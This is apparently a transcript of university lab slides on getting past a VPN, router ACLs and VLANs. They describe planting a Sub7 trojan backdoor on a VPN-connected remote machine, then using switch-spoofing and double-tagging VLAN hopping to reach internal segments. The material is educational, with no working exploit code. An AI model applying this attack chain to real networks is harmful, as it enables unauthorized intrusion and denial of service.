Slide 1 - ECE Users Pages
Download
Report
Transcript Slide 1 - ECE Users Pages
Bypass a VPN, ACL, and
VLAN
ECE 4112
Alaric Craig and Pritesh Patel
Goal
Bypass
three layers of security
VPN
Router ACLs
VLAN
Effectively,
an outsider could bring an
internal network down with a DOS.
Method
Exploit
authenticated remote machine
Use the established VPN tunnel
Send traffic that bypasses Router ACLs
and cross VLANs.
How
Use
Sub7 to create a backdoor to the
remote machine.
From remote machine, use existing vpn
tunnel to communicate inside the network.
Now have access, perform VLAN Hopping
attack.
Sub 7
Trojan
Horse use to gain root level access
Many fun modules
Keylogging
Enable telnet and ftp
Tic tac toe
Realistic Matrix
In our case
VPN Bypassed
Once
into the remote machine, telnet to
VLAN 1 machine. A send vlan hopping
traffic
VPN’s used: Cisco VPN concentrator and
OpenVpn. Once connection setup, the
prompt can be used to send traffic to the
internal machine.
VLANs
Virtual
Local Area Networks
A logical grouping of devices or users
Users can be grouped by function,
department, application, regardless of
physical segment location
VLAN configuration is done at the switch
(Layer 2)
VLAN Membership
Static VLAN Assignment
- Port based membership: Membership is
determined by the port on the switch on
not by the host.
Dynamic VLAN Assignment
- Membership is determined by the host’s
MAC address. Administrator has to
create a database with MAC addresses and
VLAN mappings
VLAN Communication
•
•
•
VLANS cannot communicate with each other
even when they exist on the same switch
For VLANS to communicate they must pass
through a router
Each VLAN is required to have at least one
gateway to route packets in and out of the
network
VLAN Trunking
Trunking
allows us to cascade multiple
switches using the trunk ports to
interconnect them
Trunk ports act as a dedicated path for each
VLAN between switches
The trunk port is a member of all configured
VLANs
VLAN Tagging
Two
dominant tagging technologies:
- Inter Switch Link (ISL) (Cisco Proprietary
Technology)
- IEEE 802.1q (Industry Adopted
Standard)
VLAN Network Setup
Access Control List
Router ACLs:
Standard IP access list ADMIN
10 permit 192.168.0.0, wildcard bits 0.0.151.255
20 permit 57.35.0.0, wildcard bits 0.0.159.255
30 deny any log
Extended IP access list ACCT
10 permit icmp any any echo-reply
20 deny ip 10.1.10.0 0.0.0.255 192.168.0.0 0.0.151.255
30 permit ip 57.35.0.0 0.0.159.255 192.168.0.0 0.0.151.255
40 deny ip any any log
Extended IP access list IT
10 permit icmp any any echo-reply (24 matches)
90 deny ip 10.1.10.0 0.0.0.255 57.35.0.0 0.0.159.255
100 deny ip 192.168.0.0 0.0.151.255 57.35.0.0 0.0.159.255
110 deny ip any any log
ACL Demonstration
Switch Default Configuration
Dynamic Trunking Protocol (DTP) automates ISL/802.1q trunk
configurations
DTP States:
On: "I want to be a trunk and I don't care what you think!" State used
when the other switch does not understand DTP.
Off: "I don't want to be a trunk and I don't care what you think!" State
used when the configured port is not intended to be a trunk
port.
Desirable: "I'm willing to become a VLAN trunk; are you interested?"
State used when the switch is interested in being a trunk.
Auto: "I'm willing to go with whatever you want!" This is the default
on many switches.
Non-Negotiate: "I want to trunk, and this is what kind of trunk I will
be!“
Native VLAN set to VLAN 1
VLAN Hopping Attacks
These
attacks are designed to allow the
attacker to bypass the Layer 3 device
The
attack takes advantage of incorrectly
configured trunk ports on network switches
VLAN Hopping Attacks
Basic
VLAN Hopping Attack
1. Attacker fools switch into thinking that
he is a switch that needs trunking
2. The attack needs a trunking favorable
setting such as Auto to succeed
3. The attacker is now a member of all
trunked VLANs on the switch and he
send and receive data on those VLANs
VLAN Hopping Attacks
Double Encapsulated VLAN Hopping Attack
1. Switches perform only one level of IEEE
802.1q decapsulation
2. This allows the attacker to specify a .1q
tag inside the frame, allowing the frame
to go to a VLAN that the outer tag did
specify.
3. This attack works even if Trunk ports are
set to OFF
Identification of VLAN Tags Using
Ethereal
VLAN Tag
81 00 0n nn
VLAN Hopping Attack Using
Tcpreplay